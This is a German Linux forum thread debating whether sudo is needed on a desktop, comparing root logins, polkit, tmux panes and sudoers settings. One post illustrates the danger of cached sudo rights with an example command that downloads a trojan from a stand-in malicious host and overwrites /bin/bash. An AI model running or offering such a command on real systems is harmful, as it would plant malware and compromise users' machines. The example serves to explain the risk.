braucht man "sudo" ?
Re: braucht man "sudo" ?
Die Updates, die von MS geliefert werden, brauchen keine extra Berechtigung und werden ohne diese "Admin Fenster"
installiert. Finde ich auch richtig, da wie von mir oben schon gesagt man darüber kaum Kontrolle haben kann.
Soweit ich zurückdenken kann (weiter als XP reicht mein Gedächtnis hier nicht zurück) werden bei sonstigen Updates
immer Per Fenster die Zustimmung des Users eingeholt.
Auch bei Windows muss man für bestimmte Aktionen das Programm als Admin starten (z.B. cmd / Powershell).
Alles geht auch da nicht als user.
installiert. Finde ich auch richtig, da wie von mir oben schon gesagt man darüber kaum Kontrolle haben kann.
Soweit ich zurückdenken kann (weiter als XP reicht mein Gedächtnis hier nicht zurück) werden bei sonstigen Updates
immer Per Fenster die Zustimmung des Users eingeholt.
Auch bei Windows muss man für bestimmte Aktionen das Programm als Admin starten (z.B. cmd / Powershell).
Alles geht auch da nicht als user.
Re: braucht man "sudo" ?
Ich habe doch aber an den Berechtigungen nichts geändert. Alle Log- Files haben diese Berechtigung -rw-r--r--niemand hat geschrieben:02.12.2017 13:29:25Was deine Logfiles angeht: wenn bei dir gerade nix drinsteht, was relevant sein könnte: prima. Für dich. Wie man dann darauf kommt, dass es bei jedem anderen auch so wäre, erschließt sich mir allerdings nicht.
Code: Alles auswählen
$ ls -al /var/log/auth.log
-rw-r--r-- 1 root root 146966 Dez 2 13:17 /var/log/auth.log
Es ist doch überhaupt kein Problem. z.B. bei KDE das update ohne diese root Abfrage laufen zu lassen.
Der werfe den ersten Stein der jedes mal genauestens prüft, und beurteilen kann, was da upgedatet wird. Das ist z.B. ein Grund, warum ich Updates lieber auf der Konsole mache, da es - zu mindest für mich - dort übersichtlicher ist.
Re: braucht man "sudo" ?
Klar, aber dadurch, dass jeder bei Windows als admin unterwegs war und dementsprechend Rechte hatte, ist das ganze Virus, Trojaner, Wurm und Malwareproblem doch erst so groß geworden.geier22 hat geschrieben:02.12.2017 13:35:55Erzählt also nicht immer falsche Dinge. Wie auch bei Linux liegt es meistens am Bediener.
Da gebe ich lieber ab und zu mal ein Passwort ein, anstatt standardmäßig alles zu erlauben, nur weil es bequemer ist. Mal ganz davon abgesehen, dass die Passwortabfrage einige vielleicht doch mal zum Nachdenken bringt, darüber, was sie gerade machen und warum dafür root-Rechte erforderlich sind.
Wie weiter oben schon gesagt wird, geht es doch nicht speziell um Updates. Es geht darum, dass nicht jeder Hans und Franz in Systemverzeichnissen herumwursteln darf. Wer einfach so, ohne root-Rechte ein Update installieren darf, der darf auch einen Trojaner installieren.Der werfe den ersten Stein der jedes mal genauestens prüft, und beurteilen kann, was da upgedatet wird.
- Lord_Carlos
- Beiträge: 5578
- Registriert: 30.04.2006 17:58:52
- Lizenz eigener Beiträge: GNU Free Documentation License
- Wohnort: Dänemark
Re: braucht man "sudo" ?
Aber es kann doch nicht jeder Hans und Franz ins C/:Windows oder C:/Programm Files reinschreiben. Man muss es bestaetigen, aehnlich wie bei Linux eine Sudo / root pw abfrage.
Trotzdem kann man updates ohne PW starten.
Was bei Windows XP mal war ist doch nicht mehr relevant.
Oder habe ich da was falsch verstanden.
Trotzdem kann man updates ohne PW starten.
Was bei Windows XP mal war ist doch nicht mehr relevant.
Oder habe ich da was falsch verstanden.
Code: Alles auswählen
╔═╗┬ ┬┌─┐┌┬┐┌─┐┌┬┐╔╦╗
╚═╗└┬┘└─┐ │ ├┤ │││ ║║
╚═╝ ┴ └─┘ ┴ └─┘┴ ┴═╩╝ rockt das Forum!
Re: braucht man "sudo" ?
Ich habe ja auch geschrieben, dass ich Windows seit 10 Jahren nicht mehr kenne. Wenn sie zwischenzeitlich dazugelernt haben.... umso besser. Das zeigt doch nur, dass der Linux-Weg der bessere ist. Sonst wäre Microsoft doch bei der alten "Der Nutzer darf alles"-Geschichte geblieben.
Aber es wird langsam sehr OT.
Daher noch einmal meine Meinung:
Braucht man sudo?
Auf einem Einzelplatzrechner... nein, ganz sicher nicht. Wozu?
Aber es wird langsam sehr OT.
Daher noch einmal meine Meinung:
Braucht man sudo?
Auf einem Einzelplatzrechner... nein, ganz sicher nicht. Wozu?
Re: braucht man "sudo" ?
Auch bei nicht MS-Software? (Z.B. Firefox, Filezilla usw.) ...weiß ich wirklich nicht, bin nicht so der Windowsprofi.
Nein ist nicht relevant.Was bei Windows XP mal war ist doch nicht mehr relevant.
Oder habe ich da was falsch verstanden.
Re: braucht man "sudo" ?
Richtig.Lord_Carlos hat geschrieben:02.12.2017 14:23:22Aber es kann doch nicht jeder Hans und Franz ins C/:Windows oder C:/Programm Files reinschreiben. Man muss es bestaetigen, aehnlich wie bei Linux eine Sudo / root pw abfrage.
Trotzdem kann man updates ohne PW starten.
Es ist letztendlich nur eine Frage des Designs des jeweiligen Anwendungsprogramms.
Wenn ich über PolicyKit das Update ohne PW- Abfrage erlaube, weil es eben aus meiner Sicht Sinn macht,
dann darf für den Fall des Updates in den Stammverzeichnissen geschrieben werden. Sonst nicht. Fertig
Wenn der User sich über einen USB-Stick mit der Außenwelt verbinden möchte, soll er das dürfen, und
nicht über diverse root- PW - Abfragen genervt werden.
Zumal das Ergebnis dieser blödsinnigen PW- Abfrage - Orgie dasselbe ist, als würde er sich über ein normales LAN- Kabel mit der Außenwelt verbinden. Er darf in das Internet
Wenn Sudo nicht vorhanden ist - was wir ja bei einem Desktop- System überwiegend anscheinend richtig finden,
wird es in diesem Fall sogar zu einem Sicherheitsrisiko, da das Root- PW bekannt sein müsste.
Andernfalls müsste aufwendig über Policies die Erlaubnis erteilt werden.
Edit:
Da die Anwendungsprogramme ihre eigenen Policies mitbringen, ist es also einzig und allein in der Hand das Paketbetreuers,
zu entscheiden, was das Programm darf oder eben nicht. Das war schon immer so höre ich einfach zu oft, nicht nur bei Debian.
Im Falle von ksystemlog ist es einfach eine Schlampigkeit, dass dieses Fenster immer noch kommt, und man ignorieren drücken muss, um das Programm zu starten. Oder man drückt OK dann kommt das root-PW- Abfrage-Fenster, das man wiederum ignorieren kann, oder man gibt halt das root PW ein und hat das gleiche wie vorher ?? Was soll ein neuer User
davon denken, als dass er toot irgendwann nicht mehr so erst nimmt
Zuletzt geändert von geier22 am 02.12.2017 15:05:02, insgesamt 1-mal geändert.
Re: braucht man "sudo" ?
Jetzt habe ich erst erkannt, worauf du hinauswillst: du lässt es via polkit als Root laufen, was ich weiter oben schon als Möglichkeit angegeben hatte. Kann man so machen – man opfert dann halt wieder ’n Stückchen Sicherheit für ’n Stückchen mehr Bequemlichkeit. Hatte dann deine Antwort falsch verstanden, nun stellt sich mir aber die Frage: was willst du denn an den Rechten überdacht haben? Funktioniert doch, wie du möchtest?geier22 hat geschrieben:02.12.2017 13:47:48Es ist doch überhaupt kein Problem. z.B. bei KDE das update ohne diese root Abfrage laufen zu lassen.
Als Admin richtet man das System so ein, wie man’s als User haben möchte – incl. gewünschter Rechteanpassungen/-ausweitungen. Fortan kann man als User das machen, was man sich als Admin erlaubt hat, und der Admin-Account bleibt der Administration vorbehalten. Kein sudo benötigt.
Was man als Admin sich als User erlaubt, ist persönliche Ermessensfrage. Du legst eh nicht viel Wert auf Sicherheit und Stabilität, ziehst dafür Aktualität und Bequemlichkeit vor – du richtest dir dein System entsprechend ein (oder nimmst ’ne Distri, die das größtenteils für dich übernimmt) – damit ist nix verkehrt. Nur der interessierte Neuling (also etwa auch der Threadstarter) wäre besser beraten, auf etabliertere Prozeduren zu setzen. Meine Meinung.
- Lord_Carlos
- Beiträge: 5578
- Registriert: 30.04.2006 17:58:52
- Lizenz eigener Beiträge: GNU Free Documentation License
- Wohnort: Dänemark
Re: braucht man "sudo" ?
Brauchen nicht. Es ist aber nett.Radfahrer hat geschrieben:02.12.2017 14:47:41Auf einem Einzelplatzrechner... nein, ganz sicher nicht. Wozu?
Ich habe eine bash histroy mit befehlen wo ich root brauche und user rechte.
Ich kann einfach abwechselt zwischen befehlen mit unterschiedlichen rechten wechseln.
$make -> libx fehlt
$sudo apt install libx
$make -> liby fehlt
$sudo apt install liby
Ohne das ich immer pw eingeben muss. Ist einfach angenehm. Geht auch wunderbar ohne.
Code: Alles auswählen
╔═╗┬ ┬┌─┐┌┬┐┌─┐┌┬┐╔╦╗
╚═╗└┬┘└─┐ │ ├┤ │││ ║║
╚═╝ ┴ └─┘ ┴ └─┘┴ ┴═╩╝ rockt das Forum!
- Animefreak79
- Beiträge: 299
- Registriert: 25.11.2017 12:29:51
- Lizenz eigener Beiträge: GNU General Public License
Re: braucht man "sudo" ?
Wow, was hab ich hier bloß losgetreten? O_o Nur nochmal kurz:
@geier22 (wegen der Logfiles):
Demzufolge:
Und das war, nachdem ich Debian installiert hab, definitiv so voreingestellt.
@geier22 (wegen der Logfiles):
Code: Alles auswählen
shinji@nerv-kommandozentrale:~$ ls -l /var/log/auth.log
-rw-r----- 1 root adm 181248 Dez 2 15:17 /var/log/auth.log
shinji@nerv-kommandozentrale:~$ ls -l /var/log/messages
-rw-r----- 1 root adm 3033275 Dez 2 15:18 /var/log/messages
shinji@nerv-kommandozentrale:~$
Code: Alles auswählen
shinji@nerv-kommandozentrale:~$ cat /var/log/auth.log
cat: /var/log/auth.log: Keine Berechtigung
shinji@nerv-kommandozentrale:~$
~ Never change a flying system ~
Re: braucht man "sudo" ?
@niemand :
Ich glaube, dass gerade ein Neuling von den vielen - aus meiner Sicht eher unnötigen - Root-PW Abfragen irritiert wird.
Nicht umsonst ist dadurch bei Ubuntu die Verwässerung von Sudo entstanden.
Ich habe seit kurzem Sudo und gksu (gksudo kdesudo) aus meinem System verbannt. Da z.B. kein einziger Editor eine eigene Policy mitbringt, ist es nur möglich über gksu (also sudo) diesen mit Rootrechten zu starten. (alternative wäre Root- Terminal mit Befehl.
Beides wäre "etabliert". Aber eben im Bezug auf die Verwendung von sudo rückwärts führend.
Die Verbannung von sudo samt Anhängen war aber nur möglich, da ich mir für diverse Programme eigene Policies angelegt habe, um z.B. einen Editor als Root aus einen Dateimanager heraus starten zu können, bzw. die Möglichkeit zu haben, einen Starter anzulegen. Wohlgemerkt : Mit PW- Abfrage
Ich halte das z.B. für sicherer als gleich den ganzen Dateimanager mit pkexec (die haben alle eine Policy) als Root zu starten. Was - soweit ich das beurteilen kann - die "etablierte Prozedur" wäre. Das über die Konsole zu machen halte ich für archaisch und nicht zeitgemäß.
Man kann aber nicht von einem Neuling verlangen, dass er dies von Anfang an beherrscht. Und stattdessen über sudo schimpfen aber keine vernünftig anzuwendenden Alternativen im System haben. Für Dolphin gibt es einen Haufen sehr praktische Erweiterungen, die alle auf sudo aufsetzen. Warum macht man sich hier keine weitergehenden Gedanken?
Das, meine ich, ist lediglich eine Frage des Designs der einzelnen Programme. Und- dass man sich Gedanken darüber macht.
Ich glaube, dass gerade ein Neuling von den vielen - aus meiner Sicht eher unnötigen - Root-PW Abfragen irritiert wird.
Nicht umsonst ist dadurch bei Ubuntu die Verwässerung von Sudo entstanden.
Ich habe seit kurzem Sudo und gksu (gksudo kdesudo) aus meinem System verbannt. Da z.B. kein einziger Editor eine eigene Policy mitbringt, ist es nur möglich über gksu (also sudo) diesen mit Rootrechten zu starten. (alternative wäre Root- Terminal mit Befehl.
Beides wäre "etabliert". Aber eben im Bezug auf die Verwendung von sudo rückwärts führend.
Die Verbannung von sudo samt Anhängen war aber nur möglich, da ich mir für diverse Programme eigene Policies angelegt habe, um z.B. einen Editor als Root aus einen Dateimanager heraus starten zu können, bzw. die Möglichkeit zu haben, einen Starter anzulegen. Wohlgemerkt : Mit PW- Abfrage
Ich halte das z.B. für sicherer als gleich den ganzen Dateimanager mit pkexec (die haben alle eine Policy) als Root zu starten. Was - soweit ich das beurteilen kann - die "etablierte Prozedur" wäre. Das über die Konsole zu machen halte ich für archaisch und nicht zeitgemäß.
Man kann aber nicht von einem Neuling verlangen, dass er dies von Anfang an beherrscht. Und stattdessen über sudo schimpfen aber keine vernünftig anzuwendenden Alternativen im System haben. Für Dolphin gibt es einen Haufen sehr praktische Erweiterungen, die alle auf sudo aufsetzen. Warum macht man sich hier keine weitergehenden Gedanken?
Das, meine ich, ist lediglich eine Frage des Designs der einzelnen Programme. Und- dass man sich Gedanken darüber macht.
Zuletzt geändert von geier22 am 02.12.2017 16:06:12, insgesamt 1-mal geändert.
Re: braucht man "sudo" ?
Gerade bei einem Neuling ist es, meiner Meinung nach, wichtig, dass die Grenze zwischen User und Admin eben nicht verwässert wird. Damit er nämlich bewusst aktiv werden muss, wenn er potentiell was kaputtmachen kann.
Was Lord_Carlos’ sudo-Beispiel angeht:
… ohne, dass ich jeweils das Passwort eingeben muss. Und ohne sudo. Aber mit tmux, und die Histories bleiben fein getrennt
Was Lord_Carlos’ sudo-Beispiel angeht:
Code: Alles auswählen
$ make blub → libbla fehlt
$ [Strg+bm] → # aptitude install libbla
# [Strg+bm] → $ make blub
- Lord_Carlos
- Beiträge: 5578
- Registriert: 30.04.2006 17:58:52
- Lizenz eigener Beiträge: GNU Free Documentation License
- Wohnort: Dänemark
Re: braucht man "sudo" ?
Ich vermute das wechselt zwischen zwei Aktiven Sitzungen? Also root ist immer eingelogged?niemand hat geschrieben:02.12.2017 15:45:11Was Lord_Carlos’ sudo-Beispiel angeht:Code: Alles auswählen
$ [Strg+bm]
Will ich eben ja nicht.
Gibt immer mehr als 3 Wege etwas zu loesen unter Linux.
Code: Alles auswählen
╔═╗┬ ┬┌─┐┌┬┐┌─┐┌┬┐╔╦╗
╚═╗└┬┘└─┐ │ ├┤ │││ ║║
╚═╝ ┴ └─┘ ┴ └─┘┴ ┴═╩╝ rockt das Forum!
Re: braucht man "sudo" ?
Jo - das Hast du - aber anscheinend - wie ich schon sagte eben eine Frage des Designs .Animefreak79 hat geschrieben:02.12.2017 15:24:48Wow, was hab ich hier bloß losgetreten? O_o Nur nochmal kurz:
@geier22 (wegen der Logfiles):
Hab mal gleich recherchiert:
SparkyLinux Buster Lxqt
Code: Alles auswählen
hans@hans-pc:~$ ls -al /var/log/auth.log
-rw-r--r-- 1 root root 53127 Dez 2 15:45 /var/log/auth.log
Code: Alles auswählen
hans@debian:~$ ls -al /var/log/auth.log
-rw-r----- 1 root adm 2586 Dez 2 15:40 /var/log/auth.log
Mach ich mal komplett:40078
Da hat sich wohl was zum Sinnvollen geändert
Re: braucht man "sudo" ?
Es wechselt bei mir zwischen zwei Panes. Root bekommt sein Pane, wenn er das erste Mal gebraucht wird und das Pane wird geschlossen, wenn er nicht mehr gebraucht wird.Lord_Carlos hat geschrieben:02.12.2017 16:00:31Ich vermute das wechselt zwischen zwei Aktiven Sitzungen? Also root ist immer eingelogged?
Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg. Wenn in der sudoers allerdings festgelegt ist, dass der User nur genau "apt install" ausführen darf, sieht’s wieder etwas anders aus. Dann kann ’ne böswillige Software allenfalls das System vollaufen lassen, und das bemerkt man dann hoffentlich rechtzeitig, um’s zu stoppenLord_Carlos hat geschrieben:02.12.2017 16:00:31Gibt immer mehr als 3 Wege etwas zu loesen unter Linux.
- Lord_Carlos
- Beiträge: 5578
- Registriert: 30.04.2006 17:58:52
- Lizenz eigener Beiträge: GNU Free Documentation License
- Wohnort: Dänemark
Re: braucht man "sudo" ?
Aber wie ist das schlimmer als ein root panel das immer da ist?niemand hat geschrieben:02.12.2017 16:09:49Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.
Code: Alles auswählen
╔═╗┬ ┬┌─┐┌┬┐┌─┐┌┬┐╔╦╗
╚═╗└┬┘└─┐ │ ├┤ │││ ║║
╚═╝ ┴ └─┘ ┴ └─┘┴ ┴═╩╝ rockt das Forum!
Re: braucht man "sudo" ?
Genau so sehe ich das auch. Wenn alles "einfach so" geht, merkt ein Einsteiger gar nicht, was er da macht.niemand hat geschrieben:02.12.2017 15:45:11Gerade bei einem Neuling ist es, meiner Meinung nach, wichtig, dass die Grenze zwischen User und Admin eben nicht verwässert wird. Damit er nämlich bewusst aktiv werden muss, wenn er potentiell was kaputtmachen kann.
Und nochmal volle Zustimmung.niemand hat geschrieben:02.12.2017 16:09:49Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.
Wenn ich root- und Nutzerbefehle abwechselnd eingeben muss, öffne ich halt zwei Terminals.
Re: braucht man "sudo" ?
Angenommen, du hast das Makefile nicht geprüft, sondern, weil’s aus vermeintlich sicherer Quelle stammt (die aber leider, wie’s ja ab und zu passiert, aufgemacht wurde) gleich durchlaufen lassen. Dir fehlt eine Lib → „sudo“, Userpass, installieren, alles fein. Du lässt das File nochmal durchlaufen, die Lib ist nun da, und nebenbei installiert’s dir mit etwa „sudo wget -o /bin/bash https://böslinge.inc/trojan_bash“ eine hübsche neue Shell. Dies z.B. kann bei der Variante mit dem Multiplexer nicht passieren. Abgesehen davon ist das Root-Pane nicht immer da, sondern wird wieder zugemacht, sobald der Build durch ist. Während deine 15 Minuten möglicherweise noch nicht abgelaufen sind, nachdem du fertig bist, und noch anderen Kram mit dieser Shell machst.Lord_Carlos hat geschrieben:02.12.2017 16:14:29Aber wie ist das schlimmer als ein root panel das immer da ist?
- Lord_Carlos
- Beiträge: 5578
- Registriert: 30.04.2006 17:58:52
- Lizenz eigener Beiträge: GNU Free Documentation License
- Wohnort: Dänemark
Re: braucht man "sudo" ?
Mhh, so oder so bin ich gefickt. Crypto Währung mining, spam versenden, Daten lesen/loeschen etc. alle ohne root.
Ich sehe ein das eines Schlimmer ist als das andere, aber ob mich nun jemand mit einer Waffe erschießt oder ich durch ein Messerstich langsam Sterbe, am ende bin ich tot.
Ich kenne mich mit make nicht so aus, aber koennte es bei #make install aus der root Konsole auch eine neue Shell installieren?
Sudo im anderem Pane ist dann das beste aus beiden Welten Weil man automatisch ausgelogged wird.
Ich sehe ein das eines Schlimmer ist als das andere, aber ob mich nun jemand mit einer Waffe erschießt oder ich durch ein Messerstich langsam Sterbe, am ende bin ich tot.
Ich kenne mich mit make nicht so aus, aber koennte es bei #make install aus der root Konsole auch eine neue Shell installieren?
Sudo im anderem Pane ist dann das beste aus beiden Welten Weil man automatisch ausgelogged wird.
Code: Alles auswählen
╔═╗┬ ┬┌─┐┌┬┐┌─┐┌┬┐╔╦╗
╚═╗└┬┘└─┐ │ ├┤ │││ ║║
╚═╝ ┴ └─┘ ┴ └─┘┴ ┴═╩╝ rockt das Forum!
Re: braucht man "sudo" ?
Sure, die Malware kann auch als User laufen. Aber mit UID0 lässt’s sich viel schöner verstecken und ist daher weit langlebiger. Außerdem wirkt Ransomware viel toller, wenn sie sich schon im Bootloader mit dem Hinweis meldet, das System wäre nun verschlüsselt und man solle doch dem armen Entwickler einige Kekse zukommen lassen, um das zu beheben. Und auch Keylogger und Screenshot/-recording-Programme laufen viel besser mit ausreichenden Berechtigungen. Auch nicht zu verachten sind die Ports unterhalb 1024, die sich nur mit UID0 aufmachen lassen.
# make install kann im Grunde alles überschreiben. Damit haben sich ja auch schon einige ihr System damit zerlegt: irgendwas damit installiert, das dann Files überschrieben hat, die ’nem installierten Paket gehört haben. Das ist einer der Hauptgründe, warum man’s gefälligst mit --prefix=~/… konfigurieren, und make install als User ausführen sollte.
# make install kann im Grunde alles überschreiben. Damit haben sich ja auch schon einige ihr System damit zerlegt: irgendwas damit installiert, das dann Files überschrieben hat, die ’nem installierten Paket gehört haben. Das ist einer der Hauptgründe, warum man’s gefälligst mit --prefix=~/… konfigurieren, und make install als User ausführen sollte.
- ingo2
- Beiträge: 1124
- Registriert: 06.12.2007 18:25:36
- Lizenz eigener Beiträge: GNU Free Documentation License
- Wohnort: Wo der gute Riesling wächst
Re: braucht man "sudo" ?
Das sollte man dann wenigstens gleich in der sudoers ändern:niemand hat geschrieben:02.12.2017 16:09:49Sicher. Nur ‘n sudo, das generell Rootrechte verschafft und die dann auch ’ne Viertelstunde ohne weitere Nachfrage verfügbar hält, ist kein guter Weg.
Code: Alles auswählen
Defaults !lecture,tty_tickets,!fqdn,targetpw,timestamp_timeout = 0
avatar: [http://mascot.crystalxp.net/en.id.2938- ... nther.html MF-License]
Re: braucht man "sudo" ?
Ein falscher sudo-Befehl ist wie ein falscher root-Befehl. root ist root. Was soll das mit dem Abmelden? Was soll neben abgeforkten Prozessen noch mehr passieren? Oder werden Kindsprozesse wie screen, tmux, ... beendet? Kann das mal jemand testen?
Ich sehe keinen Vorteil im Ubuntu-sudo-Umfeld ... eher Nachteile.
Code: Alles auswählen
sudo whoami
- novalix
- Beiträge: 1909
- Registriert: 05.10.2005 12:32:57
- Lizenz eigener Beiträge: MIT Lizenz
- Wohnort: elberfeld
Re: braucht man "sudo" ?
@Lord_Carlos Anwendungsbeispiel ist doch ein klassisches Einsatzszenario für sudo.
Allerdings eben nicht für eine Konfiguration à la "Mitglied der Gruppe sudo darf alles mit Password-Caching".
Wenn sein Softwarebau-User oder generischer ein Mitglied der Gruppe "Softwarebau" per /etc/sudoers das Recht bekommt "/usr/bin/apt" auszuführen, ist doch alles in Butter; selbst mit einem Timeout über Null (der Default bei Upstream liegt übrigens bei fünf Minuten).
Ein Aufruf von wget um eine Systemdatei zu überschreiben wie in @niemands Beispiel wäre dann nicht möglich.
Genau für solche Szenarien ist sudo konzipiert. Man muss es eben nur auch richtig konfigurieren.
Per aspera ad astra.
Allerdings eben nicht für eine Konfiguration à la "Mitglied der Gruppe sudo darf alles mit Password-Caching".
Wenn sein Softwarebau-User oder generischer ein Mitglied der Gruppe "Softwarebau" per /etc/sudoers das Recht bekommt "/usr/bin/apt" auszuführen, ist doch alles in Butter; selbst mit einem Timeout über Null (der Default bei Upstream liegt übrigens bei fünf Minuten).
Ein Aufruf von wget um eine Systemdatei zu überschreiben wie in @niemands Beispiel wäre dann nicht möglich.
Genau für solche Szenarien ist sudo konzipiert. Man muss es eben nur auch richtig konfigurieren.
Per aspera ad astra.
Das Wem, Wieviel, Wann, Wozu und Wie zu bestimmen ist aber nicht jedermannns Sache und ist nicht leicht.
Darum ist das Richtige selten, lobenswert und schön.
Darum ist das Richtige selten, lobenswert und schön.
Re: braucht man "sudo" ?
Ich glaube, hier wollte auch niemand, ehmm...: keiner , die Nützlichkeit von sudo für bestimmte Zwecke und in sinnvoller Konfiguration bestreiten, aber "MAN" braucht sudo eben eher nicht.
Grüße, Günther
Grüße, Günther
Re: braucht man "sudo" ?
Vor dem Hintergrund, dass das m.M.n bei Debian gar nicht so ein großes Problem ist, wenn der unbedarfte User einfach nur den Hinweisen des Installers folgt und sich daran hält, empfinde ich das auch gar nicht so sehr als beunruhigend. Zumal diese Community ja hierzu auch eine deutliche Meinung hat. Das größere Problem sehe ich hier bei Ubuntu und Mint. Da wird definitiv kein "Newbie" oder Windows-Umsteiger sudo richtig konfigurieren, weil es in deren Community weder Hinweise dazu gibt, noch überhaupt ein Problembewusstsein besteht. Ganz im Gegenteil, da wird sogar das root-PWD als Sicherheitsrisiko hingestellt und munter der fahrlässige Missbrauch von sudo empfohlen. Natürlich juckt uns das hier nicht... aber da steckt schon Potential drin, dem Ruf von Linx allgemein zu schaden... muss nicht, aber es ist möglich... und das gefällt mir nicht.